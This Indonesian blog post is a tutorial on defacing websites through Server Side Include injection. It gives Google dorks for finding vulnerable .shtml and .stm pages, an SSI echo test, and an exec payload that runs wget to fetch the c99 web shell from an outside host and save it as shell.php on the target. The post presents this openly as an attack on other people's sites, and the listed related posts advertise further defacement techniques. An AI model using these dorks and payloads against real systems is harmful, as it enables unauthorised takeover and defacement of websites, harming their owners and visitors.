Deface Dengan Cara Server Side Include Injection (SSI Injection)

1 min read
Hallo dude kembali lagi dengan admin Trolling System :)

Sebelumnya dari gw sendiri serta admin yang lain mengucapkan
Minal aidzin wal faidzin, Mohon maaf lahir batin :)

Mohon di maafkan bila admin berkata yang tidak sewajarnya dan tidak pantas di blog ini, mohon di maafkan :)


Dan hari ini gw ingin share POC Deface Dengan Cara Server Side Include Injection (SSI Injection)

Lalu apa itu SSI Injection
Gw jelasin sedikit apa itu SSI Injection

Server Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.
SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis di halaman HTML. Halaman HTML dengan tag SSI biasanya memiliki ekstensi shtml atau shtm.

Penggunaan SSI yang paling umum adalah termasuk konten file ke dalam halaman web dari server web.


DORK

inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


Gw menemukan halaman ini dan memasukkan nama pengguna gw sebagai Sylar:




Kita dapat melihat pada gambar di atas bahwa nama pengguna yang kita masukkan telah ditampilkan di layar setelah kami mengirim data dan halaman dengan ekstensi shtml, jadi menurut lo apa yang akan terjadi jika gw memasukkan nama pengguna gw sebagai:

<!--#echo var="HTTP_USER_AGENT" -->

Lalu akan muncul ini




Sekarang gw akan mencoba memasukkan kode berikut sebagai nama pengguna:

<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->

Kalau berhasil akan muncul seprti ini


The command executed successfully
Sekarang kita lihat shell kita
akses shellnya? site.com/shell.php


Ok cukup mudah bukan? XD

Ok guys cukup sekian, soalnya admin mau lebaran dulu sama teman teman, keluarga dll nya :)


ordinary people

You may like these posts

  • hallo good people kali ini gue akan share Deface Dengan Cara CSRF File Upload Vulnerability Sedikit gw jelasin, cara ini memanfaatkan form upload yang tidak di filter Ok lan…
  • Hallo sobat :D Kembali lg bersama gw disini sebagai penulis wkwkwk :v Kali ini gw share Deface Dengan Cara Admin Weak Password / Admin Poor Password Yap, teknik / cara deface…
  • hallo gan :D ok kali ini gw share Deface Dengan Cara URL Poisoning  Cara ini cukup mudah kok , langsung aja ya caranya :D Sekilas gw jelasin sedikit apa itu URL Poisoni…
  • hallo guys :D Kembali lg bersama gw disini admin XD Kali ini gw ingin share teknik deface Jquery File Upload  Cara deface ini memakai CSRF ya :) Dork = inurl:upload/server/…
  • hallo people >:( back lg bersama gw admin >:( Kali ini gw share tutorial deface ni gan Deface Dengan Cara Download Database SQL Sekilas gw jelasin Jadi cara deface ini ki…
  • hallo kawan :D kembali lagi bersama gue admin yg ganteng :v Setelah sekian lama tidak posting artikel, ya maaf sibuk dengan sekolah ( adminnya masih sekolah gan ), teman, pelajara…

Post a Comment